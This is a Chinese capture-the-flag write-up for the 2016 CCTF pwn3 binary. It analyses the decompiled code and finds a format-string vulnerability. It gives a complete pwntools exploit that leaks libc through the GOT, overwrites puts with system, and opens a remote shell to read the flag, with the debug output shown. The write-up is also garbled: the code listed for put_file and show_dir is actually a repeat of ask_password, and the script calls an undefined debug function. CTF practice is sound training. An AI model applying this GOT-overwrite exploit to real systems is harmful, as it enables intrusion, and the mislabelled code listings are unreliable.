看雪 get_pwn3(2016 CCTF 中的 pwn3)
get_pwn3(2016 CCTF 中的 pwn3) 格式化字符串漏洞
get_pwn3(2016 CCTF 中的 pwn3)
(1)
motaly@motaly-VMware-Virtual-Platform:~/桌面$ file pwn3
pwn3: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=916959406d0c545f6971223c8e06bff1ed9ae74d, not stripped
motaly@motaly-VMware-Virtual-Platform:~/桌面$ checksec --file=pwn3
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO No canary found NX enabled No PIE No RPATH No RUNPATH 88 Symbols No 0 3 pwn3(2)
用ida打开,按下F5(如果不行,看看有没有Fn键,Fn+F5)
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
int command; // eax
char s1[40]; // [esp+14h] [ebp-2Ch] BYREF
int command_1; // [esp+3Ch] [ebp-4h]
setbuf(stdout, 0);
ask_username(s1);
ask_password(s1);
while ( 1 )
{
while ( 1 )
{
print_prompt();
command = get_command();
command_1 = command;
if ( command != 2 )
break;
put_file();
}
if ( command == 3 )
{
show_dir();
}
else
{
if ( command != 1 )
exit(1);
get_file();
}
}
}发现先是给了两个函数ask_username和ask_password函数,参数都为s1
char *__cdecl ask_username(char *dest)
{
char src[40]; // [esp+14h] [ebp-34h] BYREF
int i; // [esp+3Ch] [ebp-Ch]
puts("Connected to ftp.hacker.server");
puts("220 Serv-U FTP Server v6.4 for WinSock ready...");
printf("Name (ftp.hacker.server:Rainism):");
__isoc99_scanf("%40s", src);
for ( i = 0; i <= 39 && src[i]; ++i )
++src[i];
return strcpy(dest, src);
}这个函数主要是接受一个参数s1,是一个指向字符数组的指针,用于存储处理后的用户名
这里对输入数据的处理是通过循环遍历每个字符,并将每个字符的ASCII码值加1
int __cdecl ask_password(char *s1)
{
if ( strcmp(s1, "sysbdmin") )
{
puts("who you are?");
exit(1);
}
return puts("welcome!");
}这个函数主要是接受一个参数s1,是一个指向字符数组的指针,用于传入要验证的密码字符串
当传入的字符串为"sysbdmin"时,就会继续运行。
结合看两个函数,我们要输入rxraclhm(每个字母往前移一个),才能使程序运行
(3)
看下面的循环,主要的先是一个目录get_command函数
int get_command()
{
char s1[12]; // [esp+1Ch] [ebp-Ch] BYREF
__isoc99_scanf("%3s", s1);
if ( !strncmp(s1, "get", 3u) )
return 1;
if ( !strncmp(s1, "put", 3u) )
return 2;
if ( !strncmp(s1, "dir", 3u) )
return 3;
return 4;
}输入get---get_file函数
int get_file()
{
char dest[200]; // [esp+1Ch] [ebp-FCh] BYREF
char s1[40]; // [esp+E4h] [ebp-34h] BYREF
char *i; // [esp+10Ch] [ebp-Ch]
printf("enter the file name you want to get:");
__isoc99_scanf("%40s", s1);
if ( !strncmp(s1, "flag", 4u) )
puts("too young, too simple");
for ( i = (char *)file_head; i; i = (char *)*((_DWORD *)i + 60) )
{
if ( !strcmp(i, s1) )
{
strcpy(dest, i + 40);
return printf(dest);
}
}
return printf(dest);
}这函数是获取用户输入的文件名,若存在会返回文件内容,没有此文件名,也会输出,但是�
(这里若我们先查看存在的文件,输出了文件内容,后面输入不存在的文件名,输出的内容是存在文件的文件内容和�)
这里还对敏感文件flag进行了限制,不能直接读取
还因为我们能控制dest的内容,所以存在格式化字符串漏洞
输入put---put_file函数
int __cdecl ask_password(char *s1)
{
if ( strcmp(s1, "sysbdmin") )
{
puts("who you are?");
exit(1);
}
return puts("welcome!");
}这个函数主要是输入文件名和文件内容
输入dir---show_dir函数
int __cdecl ask_password(char *s1)
{
if ( strcmp(s1, "sysbdmin") )
{
puts("who you are?");
exit(1);
}
return puts("welcome!");
}这个函数是把我们存储的文件名依次拼接,存于一个字符数组中,最后把拼接好的完整文件名信息输出到标准输出
(应该是因为是链栈,后进先出,所以后输入的在前)
(4)
思路:
这里可以通过格式化字符串漏洞,修改puts函数的got表为system函数,并给一个"/bin/sh",来完成连接
1.先根据程序自定义构造函数put,got,这里我还构造了一个addr函数(获取puts函数地址)
addr函数:
先是利用put输入文件名为/sh,内容为b'%8$s'+p32(got_addr)
(%8$s会尝试读取该p32(got_addr)地址指向的内存内容)
然后通过get输出,获取puts函数地址
2.根据puts函数获取libc基地址,进而得到system地址
3.因为put可以输入,get可以输出(存在格式化字符串漏洞),所以通过这两个函数,得到偏移量
4.构造一条ROP链,通过格式化字符串漏洞把puts函数的got表地址改为system函数地址,并且再次用输入文件名为/bin,文件内容为payload,通过get输出
5.运用dir函数,因为函数会把文件名拼接,所以是"/bin/sh",而函数最后的返回puts函数已经是system函数,所以我们最后执行的是system("/bin/sh")
(5)
编写
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
sh = remote('123.57.66.184', 10072)
# sh = process('/home/motaly/桌面/pwn3')
elf=ELF('/home/motaly/桌面/pwn3')
sh.recvuntil(b"Name (ftp.hacker.server:Rainism):")
sh.sendline(b"rxraclhm")
def put(file_name, file_content):
sh.recvuntil(b"ftp>")
sh.sendline(b"put")
sh.recvuntil(b"please enter the name of the file you want to upload:")
sh.sendline(file_name)
sh.recvuntil(b"then, enter the content:")
sh.sendline(file_content)
def get(file_name):
sh.recvuntil(b"ftp>")
sh.sendline(b"get")
sh.recvuntil(b"enter the file name you want to get:")
sh.sendline(file_name)
def addr(got_addr):
put(b'/sh', b'%8$s' + p32(got_addr)) #%8$s会尝试读取该p32(got_addr)地址指向的内存内容
get(b'/sh')
function_addr = u32(sh.recv(4))
return function_addr
puts_addr = addr(elf.got['puts'])
print("puts_addr"+hex(puts_addr))
libc = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - libc.dump('puts')
print("libc_base--->"+hex(libc_base))
system_addr = libc_base + libc.dump('system')
print("system_addr--->"+hex(system_addr))
payload = fmtstr_payload(7, {elf.got['puts']:system_addr})
debug(payload)
put(b'/bin', payload)
get(b'/bin')
sh.sendline(b'dir')
sh.interactive()(4)
连接得到flag
[*] Switching to interactive mode
[DEBUG] Received 0x10d bytes:
00000000 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 │ │ │ │ │
*
00000040 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 30 │ │ │ │ 0│
00000050 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 │ │ │ │ │
*
00000090 20 20 20 20 20 20 20 20 20 20 20 20 04 20 20 20 │ │ │ │· │
000000a0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 │ │ │ │ │
*
000000e0 20 20 20 20 20 20 20 3e 20 20 20 20 20 20 20 20 │ │ >│ │ │
000000f0 20 20 20 20 20 20 20 20 f7 28 a0 04 08 2a a0 04 │ │ │·(··│·*··│
00000100 08 2b a0 04 08 29 a0 04 08 66 74 70 3e │·+··│·)··│·ftp│>│
0000010d
0 \x04 > \xf7(\xa*\xa0\x0+\xa0\x0)\xa0\ls
[DEBUG] Sent 0x3 bytes:
b'ls\n'
[DEBUG] Received 0x2d bytes:
b'40_2016ccf_pwn3\n'
b'bin\n'
b'dev\n'
b'flag\n'
b'lib\n'
b'lib32\n'
b'lib64\n'
40_2016ccf_pwn3
bin
dev
flag
lib
lib32
lib64
$ cat flag
[DEBUG] Sent 0x9 bytes:
b'cat flag\n'
[DEBUG] Received 0x2b bytes:
b'flag{98beaded-1acb-4d51-a309-9a93a9f02416}\n'
flag{98beaded-1acb-4d51-a309-9a93a9f02416}